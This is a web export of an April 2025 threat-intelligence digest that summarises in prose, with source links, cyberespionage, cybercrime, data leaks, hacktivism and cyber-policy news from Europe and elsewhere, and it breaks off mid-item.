{"id":992324,"date":"2025-11-03T00:45:28","date_gmt":"2025-11-02T21:45:28","guid":{"rendered":"https:\/\/gpss.ro\/threat-intelligence\/cyber-brief-25-05-april-2025\/"},"modified":"2025-11-03T00:45:28","modified_gmt":"2025-11-02T21:45:28","slug":"cyber-brief-25-05-april-2025","status":"publish","type":"threat_intelligence","link":"https:\/\/delve.ro\/ro\/threat-intelligence\/cyber-brief-25-05-april-2025\/","title":{"rendered":"Cyber Brief 25-05 &#8211; April 2025"},"content":{"rendered":"<div class=\"gpss-language-switcher\" style=\"margin-bottom: 20px; padding: 15px; background: #f0f9ff; border-left: 4px solid #3b82f6; border-radius: 8px;\">\n            <div style=\"display: flex; align-items: center; justify-content: space-between; flex-wrap: wrap; gap: 10px;\">\n                <div style=\"display: flex; align-items: center; gap: 10px;\">\n                    <span style=\"font-weight: 600; color: #1e40af;\">\ud83c\udf0d Limb\u0103 \/ Language:<\/span>\n                    <button onclick=\"switchLanguage('en')\" id=\"btn-lang-en\" class=\"lang-btn lang-btn-active\" style=\"padding: 8px 16px; background: #3b82f6; color: white; border: none; border-radius: 6px; cursor: pointer; font-weight: 600; transition: all 0.3s;\">\n                        \ud83c\uddec\ud83c\udde7 English (Original)\n                    <\/button>\n                    <button onclick=\"switchLanguage('ro')\" id=\"btn-lang-ro\" class=\"lang-btn\" style=\"padding: 8px 16px; background: #e5e7eb; color: #374151; border: none; border-radius: 6px; cursor: pointer; font-weight: 600; transition: all 0.3s;\">\n                        \ud83c\uddf7\ud83c\uddf4 Rom\u00e2n\u0103\n                    <\/button>\n                <\/div>\n                <small style=\"color: #6b7280; font-style: italic;\">Traducere automat\u0103 \/ Automatic translation<\/small>\n            <\/div>\n        <\/div>\n\n        <div id=\"content-en\" class=\"lang-content\" style=\"display: block;\">\n            <div class=\"article-content\"><h2 id=\"cyber-brief-april-2025\">Cyber Brief (April 2025)<\/h2><p>May 2, 2025 - Version: 1<\/p><p class=\"tlp-type clear\">TLP:CLEAR<\/p><h2 id=\"executive-summary\">Executive summary<\/h2><ul><li><p>We analysed 311 open source reports for this Cyber Brief<sup class=\"footnote-ref\" id=\"fnref-1\"><a href=\"#fn-1\">1<\/a><\/sup>.<\/p><\/li><li><p><strong>Policy, cooperation, and law enforcement.<\/strong> The FBI sought help to identify Chinese hackers breaching telecoms. The US launched a program to shield sensitive data from foreign threats. Trump dismissed the NSA director following advice from a far-right activist, per Washington Post. China tacitly admitted cyberattacks on US critical infrastructure, framed as a response to US support for Taiwan. It also restricted rare earth exports and banned Chinese firms from engaging with US defence contractors.<\/p><\/li><li><p><strong>Cyberespionage and prepositioning.<\/strong> French, German, and Dutch authorities have linked recent cyberattacks to Russian state-backed actors, including cyberespionage against diplomatic and research institutions, and sabotage attempts on critical infrastructure. A Member of the European Parliament revealed being targeted by Iran-linked hackers in cyberespionage attempt. North Korea-linked DPRK IT Workers campaign expands globally with a focus on Europe. Still in Europe, new cases of mercenary spyware were reported, targeting journalists and activists. On the global level researchers observed the suspected Chinese UNC5221 threat actor actively exploiting critical Ivanti Connect Secure vulnerability, while a Chinese APT group targeted Russian government. Additionally, China accused US intelligence of targeting Chinese cryptographic firm. Notably, Pakistan-linked APT36 exploited Pahalgam attack theme to target Indian government.<\/p><\/li><li><p><strong>Cybercrime.<\/strong> The Tycoon2FA phishing kit now uses advanced evasion techniques, while a Cloudflare phishing campaign leverages Telegram to filter victim IPs. Lazarus continues targeting cryptocurrency platforms with fake job interviews, and the Cookie-Bite proof-of-concept shows how Chrome extensions can bypass MFA. Meanwhile, a Google DKIM flaw is being exploited for nearly undetectable phishing attacks.<\/p><\/li><li><p><strong>Data exposure and leaks.<\/strong> Notable cases of data leaks affected four sectors, namely public administration, telecommunications, technology and transport. <\/p><\/li><li><p><strong>Disruption and destruction.<\/strong> Chinese authorities accused the US NSA of launching cyberattacks during the 2025 Asian Winter Games in Harbin with the aim to disrupt critical systems and steal sensitive information. <\/p><\/li><li><p><strong>Information operation.<\/strong> Czech Prime Minister social media account was compromised to post false messages, including about a Russian attack on Czech soldiers. Lithuania warned of Russian and Belarusian hybrid activity towards Belarusian diaspora. Japanese media reported on China using AI in information operations targeting Taiwan.<\/p><\/li><li><p><strong>Hacktivism.<\/strong> In Europe, Russia-linked supposed hacktivists targeted various entities in Europe, including Finnish election-related organisations and Dutch organisations, while a coalition of hacktivists dubbed \"Holy League\" targets British military with DDoS attacks.<\/p><\/li><\/ul><h2 id=\"europe\">Europe<\/h2><h3 id=\"cyber-policy-and-law-enforcement\">Cyber policy and law enforcement<\/h3><p><strong>Czech government sanctioned Russian GRU officer<\/strong><br> On April 2, the Czech government added journalist Natalia Sudliankov\u00e1 and GRU officer Alexei Shavrov to its sanctions list for ties to Russian military intelligence. Both are accused of supporting Russian-state influence campaigns and information operations in Czechia. Sudliankov\u00e1 was ordered to leave the country within 30 days. <code>russia<\/code> <code>sanctions<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/ct24.ceskatelevize.cz\/clanek\/domaci\/vlada-rozsirila-sankcni-seznam-o-dvojici-spojenou-s-ruskou-gru-359667\">link<\/a> <\/p><p><strong>Operation Endgame brings down Smokeloader customers<\/strong><br> On April 9, Europol announced that Operation Endgame, a cooperation initiative between Europol, several EU countries\u2019 police, the US, and Eurojust, that led to the takedown of the biggest malware droppers in May 2024, conducted a new sweeping operation against Smokeloader pay-per-install botnet in early 2025. This led to arrests, house searches, and arrest warrants of customers of this botnet. <code>takedown<\/code> <code>arrests<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.europol.europa.eu\/media-press\/newsroom\/news\/operation-endgame-follow-leads-to-five-detentions-and-interrogations-well-server-takedowns\">link<\/a> <\/p><p><strong>Six cybercriminals arrested in Spain for AI scam<\/strong><br> On April 7, Spain\u2019s Polic\u00eda Nacional announced their arrest of six individuals belonging to a criminal organisation that scammed over 19 million euros out of victims worldwide. They created fake ads featuring well-known national figures through artificial intelligence, recommending that people invest in products; the victims were chosen via algorithms. <code>arrests<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.policia.es\/_es\/comunicacion_prensa_detalle.php?ID=16521\">link<\/a> <\/p><h3 id=\"cyberespionage-and-prepositioning\">Cyberespionage and prepositioning<\/h3><p><strong>French authorities attribute APT28 cyberespionage campaign to Russian state interests<\/strong><br> On April 29, the French cybersecurity agency ANSSI reported that APT28, a Russian-linked threat group, had targeted the French government, diplomatic, and research sectors between 2021 and 2024. These cyberattacks aimed to gather intelligence and are part of broader operations affecting Europe, Ukraine, and North America. The attacks continue amid Russia's ongoing war against Ukraine. ANSSI and its partners identified multiple infection chains used in these campaigns. <code>russia<\/code> <code>diplomacy<\/code> <code>research<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.cert.ssi.gouv.fr\/cti\/CERTFR-2025-CTI-006\/\">link<\/a> <\/p><p><strong>German intelligence looking into likely Russia-linked cyberattack targeting research organisation<\/strong><br> On April 8, Germany's Federal Office for Information Security (BSI) and the Federal Office for the Protection of the Constitution (BfV) announced they were investigating a cyberattack targeting the German Association for East European Studies (DGO), an organisation specialised in international relations. Threat actors breached DGO at the end of March and accessed their e-mails. German intelligence officials say that they suspect the threat actors are Russia-linked, possibly APT29. <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.dw.com\/en\/germany-suspects-russian-cyber-attack-on-research-group\/a-72175406\">link<\/a> <\/p><p><strong>Russian hackers target Dutch critical infrastructure in first known sabotage attempt<\/strong><br> On April 22, the Dutch Military Intelligence Agency (MIVD) revealed that Russian hackers attempted to sabotage the digital control system of a Dutch public facility last year, marking the first known cyberattack on the Netherlands' critical infrastructure. The agency warned of growing threats from both Russia and China, highlighting Russia\u2019s sabotage efforts in the North Sea and increasing cyber operations against European nations supporting Ukraine. <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.dw.com\/en\/dutch-intelligence-reports-russian-cyber-attack\/a-72309443\">link<\/a> <\/p><p><strong>Russia-linked threat actors target Microsoft OAuth workflows<\/strong><br> On April 22, Volexity published a blog post on Russia-linked phishing campaigns abusing Microsoft OAuth 2.0 authentication workflows to target entities with ties to Ukraine. The threat actors, tracked as UTA0352 and UTA0355, impersonate European officials and use platforms like Signal and WhatsApp to lure victims into sharing Microsoft authorisation codes. <code>public administration<\/code> <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.volexity.com\/blog\/2025\/04\/22\/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows\/\">link<\/a> <\/p><p><strong>Russia-linked Gamaredon targeted a foreign military mission in Ukraine with removable drives delivering GammaSteel<\/strong><br> Russia-linked threat actor Gamaredon targeted a foreign military mission of a Western country based in Ukraine with GammaSteel malware. Initial access was gained through infected removable drives. The infection chain involves PowerShell scripts for obfuscation and services like write.as and cURL with Tor for data exfiltration. <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.security.com\/threat-intelligence\/shuckworm-ukraine-gammasteel\">link<\/a> <\/p><p><strong>MEP Hannah Neumann targeted by Iran-linked hackers in cyberespionage attempt<\/strong><br> On April 23, European Parliament member Hannah Neumann revealed that her office was targeted by a Tehran-linked cyberespionage operation. Hackers impersonated trusted contacts to deliver malware to her laptop. The attack, attributed to Iranian group APT42, was blocked before any data was stolen. Neumann, chair of the EU-Iran delegation, believes the attempt aimed to intimidate her due to her critical stance on Iran's regime. <code>iran<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.politico.eu\/article\/european-parliament-iran-delegation-chair-victim-tehran-linked-hacking-hannah-neumann\/\">link<\/a> <\/p><p><strong>Chinese mobile interconnect providers pose surveillance risks<\/strong><br> On April 17, iVerify, a cybersecurity company, highlighted that China's state-owned mobile interconnect providers are integral to global mobile traffic, routing data for over 60 operators across 35 countries, including in Europe. iVerify emphasised the risk for man-in-the-middle attacks by such Chinese mobile interconnect providers, which could intercept traffic whenever traffic is routed using outdated, unencrypted protocols like SS7 and Diameter. <code>china<\/code> <code>telecommunications<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/iverify.io\/blog\/abusing-data-in-the-middle-surveillance-risks-in-china-s-state-owned-mobile-ecosystem\">link<\/a> <\/p><p><strong>North Korea-linked DPRK IT Workers campaign expands globally with a focus on Europe<\/strong><br> On April 1, Google Cloud reported that North Korea-linked DPRK IT Workers campaign has expanded. While the United States remains a key target, over the past months, DPRK IT workers have encountered challenges in seeking and maintaining employment in the country. Google assesses that the campaign has expanded globally, with a notable focus on Europe. The IT Worker reportedly actively sought employment with multiple organisations within Europe, particularly those within the defence industrial base and government sectors. <code>north korea<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/dprk-it-workers-expanding-scope-scale\">link<\/a> <\/p><p><strong>Two Serbian journalists targeted with Pegasus spyware in February 2025<\/strong><br> On March 28, Amnesty International reported that two journalists from the Balkan Investigative Reporting Network (BIRN), an award-winning Serbian network of investigative journalists, were targeted with NSO Group\u2019s Pegasus spyware. According to Amnesty International investigation's investigation, the intrusion happened in February 2025. This is the third time in two years that Amnesty International\u2019s Security Lab has found NSO Group\u2019s Pegasus spyware being used against civil society in Serbia. <code>psoa<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.amnesty.org\/en\/latest\/news\/2025\/03\/serbia-birn-journalists-targeted-with-pegasus-spyware\/\">link<\/a> <\/p><p><strong>EU country WhatsApp users among victims of 2019 NSO spyware campaign<\/strong><br> On April 9, the online news outlet TechCrunch published an article about court documents revealing locations of WhatsApp victims targeted by NSO spyware in 2019. At the time, more than 100 human rights activists, journalists, and civil society members were targeted, with a total of around 1400 victims. It now appears that among the victims, there were users in Spain, the Netherlands, Hungary, France, and the United Kingdom. <code>psoa<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/techcrunch.com\/2025\/04\/09\/court-document-reveals-locations-of-whatsapp-victims-targeted-by-nso-spyware\/\">link<\/a> <\/p><p><strong>Apple warns users, including a journalist and an activist in Europe, of spyware targeting<\/strong><br> On April 29, Apple notified users in 100 countries that they may have been targeted with government spyware, including Italian journalist Ciro Pellegrino and Dutch activist Eva Vlaardingerbroek. The alerts follow similar warnings by Apple and other tech firms, amid investigations into mercenary spyware allegedly sold to governments and used against journalists, activists, and NGOs. <code>psoa<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.engadget.com\/cybersecurity\/apple-sends-spyware-warnings-to-iphone-users-in-100-countries-142547474.html\">link<\/a><\/p><p><strong>Suspected data breach in Finnish Foreign Ministry\u2019s remote access service<\/strong><br> On March 27, the Finnish Ministry for Foreign Affairs detected suspicious activity in its remote access service, raising concerns about a possible data breach. In response, the Ministry swiftly disabled the service and launched an internal investigation. The incident was reported to the National Bureau of Investigation and cybersecurity authorities for further analysis. The Ministry emphasised its commitment to securing its systems and mitigating any potential risks. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/um.fi\/current-affairs\/-\/asset_publisher\/gc654PySnjTX\/content\/ulkoasiainhallinnon-etayhteyspalvelussa-tietomurtoepaily\">link<\/a> <\/p><p><strong>Polish political party targeted ahead of Polish Presidential elections<\/strong><br> On April 2, Poland's Prime Minister Donald Tusk posted on X that his political party had been the target of a cyberattack and suggested it had Eastern origins. Donald Tusk said his Civic Platform party's computer system was targeted, ahead of the upcoming presidential election. The head of Tusk's office later told Polish media that the cyberattack consisted of an attempt to take control of computers of employees of the Civic Platform office and the election staff. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.euronews.com\/my-europe\/2025\/04\/02\/polands-pm-donald-tusk-says-his-partys-computer-systems-targeted-in-cyberattack\">link<\/a> <\/p><h3 id=\"cybercrime\">Cybercrime<\/h3><p><strong>NTLM exploit CVE-2025-24054 actively abused via malicious .library-ms files<\/strong><br> On April 16, Check Point reported active exploitation of CVE-2025-24054, an NTLM hash disclosure vulnerability triggered by malicious .library-ms files. Despite Microsoft's patch on March 11, attackers began leveraging the flaw by March 19, targeting entities in Poland and Romania via malspam campaigns. The exploit requires minimal user interaction, such as right-clicking or navigating to a folder, and resembles the earlier CVE-2024-43451 vulnerability. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/research.checkpoint.com\/2025\/cve-2025-24054-ntlm-exploit-in-the-wild\/\">link<\/a> <\/p><h3 id=\"disruption-and-destruction\">Disruption and destruction<\/h3><p><strong>Cyberattack disrupts Spanish water supplier Aig\u00fces de Matar\u00f3<\/strong><br> On April 23, a cyberattack hit Spanish water supplier Aig\u00fces de Matar\u00f3, affecting corporate systems and its website but leaving water supply and quality controls intact. Aig\u00fces de Matar\u00f3 stated that the attack could inconvenience its subscribers who became unable to access corporate services, and might experience delays for billing and other administrative procedures. The nature of the attack remains unconfirmed. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/therecord.media\/cyberattack-water-supplier-barcelona-spain\">link<\/a> <\/p><h3 id=\"information-operations\">Information operations<\/h3><p><strong>Czech Prime Minister Petr Fiala social media account compromised<\/strong><br> On April 8, hackers breached Czech Prime Minister Petr Fiala's X (formerly Twitter) account, posting false messages, including about a Russian attack on Czech soldiers. The malicious activity aimed to mislead followers and potentially damage the Prime Minister's reputation. <code>russia<\/code> <code>social media<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.reuters.com\/world\/europe\/czech-pm-fialas-x-account-attacked-with-fake-posts-2025-04-08\/\">link<\/a> <\/p><p><strong>Lithuania State Security warns of Russian and Belarusian hybrid activity towards Belarusian diaspora<\/strong><br> On April 23, the State Security Department of Lithuania publicly reported about hybrid attacks planned by Russian and Belarusian intelligence services against Belarusian diaspora living in Lithuania. The attacks involved information operation components such as videos allegedly filmed by Litvinist groups and directed against Lithuania being spread on social networks. The goal of the attacks would reportedly be to incite ethnic tension and increase the sense of insecurity in Lithuania. <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.vsd.lt\/en\/2025\/04\/23\/priesiskos-zvalgybos-tarnybos-bando-organizuoti-smurtinius-ispuolius-pries-lietuvoje-gyvenancius-baltarusius\/\">link<\/a> <\/p><h3 id=\"data-exposure-and-leaks\">Data exposure and leaks<\/h3><p><strong>Major data leak under investigation at Dutch ministries<\/strong><br> On April 10, a significant data leak affecting multiple Dutch ministries, including Economic Affairs and Climate and Green Growth, came to light. Dutch authorities have not confirmed if any personal data was accessed or stolen. The Interior Ministry is leading the investigation, and the Dutch Data Protection Authority has been notified, though the full scope and impact remain unclear. <code>public administration<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/nltimes.nl\/2025\/04\/10\/major-data-leak-discovered-multiple-dutch-ministries-impact-currently-unclear\">link<\/a> <\/p><p><strong>Samsung Germany data breach exposes 270.000 customer support records<\/strong><br> On April 14, German media revealed that on March 30, data from Samsung Germany was compromised in a data breach of their logistics provider, Spectos, exposing a support database containing customer data. The breach led to the theft of 270.000 customer support records, now listed on Have I Been Pwned, including emails, names, purchases, and tracking numbers, which could be misused for phishing, although access to core systems was reportedly blocked and direct identity theft risks remain low. <code>technology<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.heise.de\/en\/news\/Have-I-Been-Pwned-270-000-data-records-stolen-from-Samsung-integrated-10350941.html\">link<\/a> <\/p><p><strong>Europcar GitLab breach exposes data of up to 200,000 customers<\/strong><br> In March 2025, a hacker gained access to Europcar Mobility Group\u2019s private GitLab repositories, stealing 37\u202fGB of data including source code, SQL backups, and configuration files. The breach may impact up to 200\u202f000 customers, with exposed names and email addresses from Europcar\u2019s Goldcar and Ubeeqo brands. Europcar confirmed the GitLab breach, notified authorities, and is contacting affected users. No passwords or payment information were reportedly compromised. <code>transport<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/europcar-gitlab-breach-exposes-data-of-up-to-200-000-customers\/\">link<\/a> <\/p><h3 id=\"hacktivism\">Hacktivism<\/h3><p><strong>Russia-linked supposed hacktivists target Finnish election-related organisations<\/strong><br> On April 8, according to Finnish newspaper Yle, Russia-linked supposed hacktivists NoName057(16) claimed responsibility for several DDoS attacks that targeted almost all Finnish parliamentary parties, as well as several organisations and websites of individuals. Election-related websites were among the targets. The group claims the attacks respond to President Stubb's proposed Ukraine ceasefire. <code>russia<\/code> <code>election<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/yle.fi\/a\/74-20154753\">link<\/a> <\/p><p><strong>Pro-Russia hacktivists target Dutch public organisations in DDoS attacks<\/strong><br> On April 30, pro-Russia threat actor NoName057(16) disrupted Dutch public and private services with ongoing DDoS attacks, targeting websites across several provinces and municipalities. The group claimed retribution for military aid to Ukraine. Despite service disruptions, Dutch officials confirmed no internal systems were compromised. The cybercrime actor continues its campaign through its DDoSia platform. <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.ncsc.nl\/actueel\/nieuws\/2025\/04\/30\/lopende-ddos-aanvallen-op-nederlandse-organisaties\">link<\/a><\/p><p><strong>Coalition of hacktivists Holy League targets British military with DDoS attacks<\/strong><br> On April 7, several media outlets reported on the Holy League, a coalition of around 90 pro-Russian and pro-Palestinian hacktivist groups, launching weekly DDoS attacks on British military and infrastructure agencies. Their mission is to conduct cyberwarfare against the allies of Ukraine and Israel. <code>defence<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/insight.scmagazineuk.com\/holy-league-claims-attack-on-ukraine-allies\">link<\/a> <\/p><h2 id=\"world\">World<\/h2><h3 id=\"cyber-policy-and-law-enforcement-2\">Cyber policy and law enforcement<\/h3><p><strong>FBI seeks public help to identify Salt Typhoon hackers behind telecom breaches<\/strong><br> On April 24, the FBI requested public assistance and announced a reward of up to 10 million US dollars for information to identify the Salt Typhoon hackers, a Chinese cyberespionage group responsible for breaches in U.S. and global telecom networks. These hackers gained access to sensitive data, including private communications of US officials, and are still targeting telecom providers worldwide, with ongoing investigations and potential sanctions on related Chinese firms. <code>china<\/code> <code>united states<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.ic3.gov\/PSA\/2025\/PSA250424-2\">link<\/a> <\/p><p><strong>US implements a national security programme to protect Americans\u2019 sensitive data from foreign adversaries<\/strong><br> On April 11, the US Department of Justice began implementing a national security program under Executive Order 14117 to prevent foreign adversaries like China, Russia, and Iran from accessing Americans\u2019 sensitive personal and government-related data. The initiative aims to counter threats such as espionage and AI-enabled surveillance by restricting data transactions and enforcing new compliance measures. <code>artificial intelligence<\/code> <code>united states<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.justice.gov\/opa\/pr\/justice-department-implements-critical-national-security-program-protect-americans-sensitive\">link<\/a> <\/p><p><strong>Trump fires NSA Director on advice from Laura Loomer, per Washington Post<\/strong><br> On April 2, Gen. Timothy Haugh was dismissed as Director of the US National Security Agency (NSA), reportedly following advice from far-right activist Laura Loomer, according to The Washington Post. Loomer had urged President Trump to remove officials she deemed insufficiently loyal. The decision has drawn criticism from top Democrats, who expressed concerns about national security implications. <code>united states<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/apnews.com\/article\/trump-national-security-agency-tim-haugh-ec08b455e2c1112f5c6bb1881fad73e2\">link<\/a> <\/p><p><strong>China tacitly acknowledges cyber activity targeting US infrastructure<\/strong><br> On 10 April, the Wall Street Journal reported that during a confidential meeting in Geneva in December 2024, Chinese officials indirectly signalled that Beijing had supported cyber intrusions against US critical infrastructure. The activity, reportedly linked to Volt Typhoon, was framed as a response to US support for Taiwan. US officials interpreted the remarks as a strategic warning amid escalating tensions. <code>china<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.wsj.com\/politics\/national-security\/in-secret-meeting-china-acknowledged-role-in-u-s-infrastructure-hacks-c5ab37cb\">link<\/a> <\/p><p><strong>China restricts exports of rare earth minerals<\/strong><br> On 13 April, the New York Times reported that China imposed new export restrictions on rare earth minerals and magnets, requiring special licenses. These materials are crucial for semiconductor production. Additionally, China\u2019s Ministry of Commerce, alongside the General Administration of Customs, reportedly banned Chinese firms from engaging with several American companies, notably military contractors. <code>china<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.nytimes.com\/2025\/04\/13\/business\/china-rare-earths-exports.html\">link<\/a> <\/p><h3 id=\"cyberespionage-and-prepositioning-2\">Cyberespionage and prepositioning<\/h3><p><strong>Suspected Chinese UNC5221 threat actor actively exploiting critical Ivanti Connect Secure vulnerability<\/strong><br> On April 3, Ivanti disclosed CVE-2025-22457, a critical buffer overflow vulnerability in Ivanti Connect Secure VPN appliances, enabling remote code execution. Mandiant and Ivanti reported active exploitation since mid-March by UNC5221, a suspected China-nexus espionage group, deploying custom malware. A patch was released on February 11, 2025; users are urged to upgrade immediately. <code>china<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/china-nexus-exploiting-critical-ivanti-vulnerability?hl=en\">link<\/a> <\/p><p><strong>Chinese APT IronHusky targets Russian government with upgraded MysterySnail malware<\/strong><br> On April 17, Kaspersky reported that Chinese-speaking IronHusky hackers are targeting Russian and Mongolian government organisations using upgraded MysterySnail RAT malware. The updated implant, observed in recent attacks, is deployed via malicious MMC scripts disguised as Word documents, which download second-stage payloads and establish persistence on compromised systems. <code>china<\/code> <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/securelist.com\/mysterysnail-new-version\/116226\/\">link<\/a> <\/p><p><strong>China accuses US intelligence of targeting Chinese cryptographic firm<\/strong><br> On April 28, China's National CSIRT (CNCERT) reported on a 2024 cyberespionage operation where a US intelligence agency targeted a leading Chinese provider of commercial cryptographic products, stealing customer data and code project files. CNCERT stated that the US-linked threat actor operated mainly during US working hours and used high-level cyberespionage tactics. This publication was likely intended as a response to recent public reporting on China's Volt Typhoon campaign. <code>china<\/code> <code>united states<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/mp.weixin.qq.com\/s\/kzdSrLdejED3MxSKtszUnA?\">link<\/a><\/p><p><strong>Trojanised Alpine Quest app used to spy on Russian military operations<\/strong><br> On April 21, researchers at Russian mobile antivirus company Doctor Web uncovered a new Android spyware campaign hiding inside trojanised versions of the Alpine Quest mapping app, often used by Russian soldiers for war zone planning. The malicious app, promoted as a cracked Pro version, steals sensitive data such as geolocation, contacts, and files - demonstrating how mobile surveillance is now being deployed on both sides of the conflict for military intelligence. <code>defence<\/code> <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/news.drweb.com\/show\/?i=15006&lng=en&c=5\">link<\/a> <\/p><p><strong>Threat actor Sapphire Werewolf targets likely Russian energy companies with updated Amethyst stealer<\/strong><br> On April 9, BI.ZONE Threat Intelligence reported on the threat actor Sapphire Werewolf and its enhanced Amethyst stealer to target energy companies, distributing it via phishing e-mails disguised as HR memos in Russian. The updated malware includes advanced virtual environment checks and uses Triple DES encryption for string protection. It collects credentials from browsers and applications, sending system data to specific addresses. The malware also executes a decoy PDF and checks for virtual machine indicators. <code>energy<\/code> <code>russia<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/bi-zone.medium.com\/sapphire-werewolf-refines-amethyst-stealer-to-attack-energy-companies-f55931a5c4d4\">link<\/a> <\/p><p><strong>Lazarus targets South Korean organisations in Operation SyncHole<\/strong><br> On April 24, Kaspersky reported that between November 2024 and February 2025, the North Korean Lazarus group launched a campaign named Operation SyncHole targeting at least six organisations in South Korea. These organisations span industries such as software, IT, finance, semiconductor manufacturing, and telecommunications. The operation exploited vulnerabilities in South Korean software to execute watering hole attacks and install various forms of malware. <code>finance<\/code> <code>north korea<\/code> <code>technology<\/code> <code>telecommunications<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/securelist.com\/operation-synchole-watering-hole-attacks-by-lazarus\/116326\/\">link<\/a> <\/p><p><strong>Kimsuky APT group exploits RDP and MS Office flaws in global cyberespionage campaign<\/strong><br> On April 14, researchers from AhnLab Security Intelligence Center (ASEC) revealed that the North Korean-linked Kimsuky group is actively exploiting RDP and Microsoft Office vulnerabilities\u2014specifically BlueKeep (CVE-2019-0708) and CVE-2017-11882\u2014in a global cyberespionage campaign known as Larva-24005. The attackers deploy custom malware like MySpy, RDPWrap, and keyloggers to maintain persistent access and exfiltrate sensitive data from targeted sectors across South Korea, the U.S., China, Japan, and more. <code>north korea<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/asec.ahnlab.com\/en\/87554\/\">link<\/a> <\/p><p><strong>APT36 exploits Pahalgam attack theme to target Indian government with Crimson RAT<\/strong><br> On April 30, cybersecurity firm Seqrite reported that Pakistan-linked APT36 used Pahalgam attack-themed decoy documents to target Indian government entities. The campaign employed Crimson RAT malware delivered via malicious Excel files with embedded macros. These files extracted and executed the malware while displaying legitimate-looking documents. The operation shared infrastructure with SideCopy, indicating coordination between the groups. \u200b <code>india<\/code> <code>pakistan<\/code> <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.seqrite.com\/blog\/advisory-pahalgam-attack-themed-decoys-used-by-apt36-to-target-the-indian-government\/\">link<\/a><\/p><p><strong>Apple patches two exploited zero-days in targeted iPhone attacks<\/strong><br> On April 16, Apple released emergency updates to fix two zero-days\u2014CVE-2025-31200 in CoreAudio and CVE-2025-31201 in RPAC\u2014used in targeted iPhone attacks. The flaws affected multiple Apple platforms and enabled remote code execution and PAC bypass. Apple and Google's threat team discovered the issues. Users are urged to update devices despite the attacks being highly targeted. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/support.apple.com\/en-us\/122282\">link<\/a> <\/p><p><strong>ClickFix: State-sponsored actors exploit new phishing technique across key sectors<\/strong><br> On April 17, Proofpoint reported that state-sponsored actors, including TA571, TA578, UAC-0050, and Storm-1865, have increasingly adopted the \"ClickFix\" phishing technique. This method deceives users into executing malicious PowerShell commands via fake error messages or CAPTCHA prompts, leading to malware infections such as DanaBot, Lumma Stealer, and AsyncRAT. Targets include sectors like transportation, logistics, and hospitality, with campaigns impersonating services like Booking.com and Microsoft SharePoint. \u200b<a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/around-world-90-days-state-sponsored-actors-try-clickfix\">link<\/a> <\/p><p><strong>Brazil allegedly conducts cyberespionage towards Paraguay amid energy trade negotiations<\/strong><br> On March 31, UOL, a Brazilian media entity, alleged that the Brazilian Intelligence Agency (ABIN) conducted a cyberespionage campaign in 2024 against the Paraguayan government to obtain sensitive information regarding energy trade negotiations. The negotiations specifically pertained to tariffs on the Itaipu hydroelectric plant. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.yahoo.com\/news\/brazils-government-admits-spying-paraguay-233533589.html\">link<\/a> <\/p><h3 id=\"cybercrime-2\">Cybercrime<\/h3><p><strong>Tycoon2FA phishing kit adopts new evasion techniques<\/strong><br> On April 10, Trustwave reported that the Tycoon2FA phishing kit has incorporated new evasion tactics, including obfuscated JavaScript using invisible Unicode characters, custom HTML5 CAPTCHA challenges, and anti-debugging scripts. These enhancements aim to bypass security measures and hinder analysis. The kit continues to target Microsoft 365 users, emphasising the need for robust detection strategies against evolving phishing threats. <a rel=\"noopener\" target=\"_blank\" href=\"https:\/\/www.trustwave.com\/en-us\/resources\/blogs\/spiderlabs-blog\/tycoon2fa-new-evasion-technique-for-2025\/\">link<\/a> <\/p><p><strong>Phishing campaign impersonates Cloudflare services and uses Telegram to filter victim IPs<\/strong><br> On April 1, researchers at hunt.io reported that they had tracked a phishing campaign which used fake Cloudflare prompts to trick users into clicking on a malicious 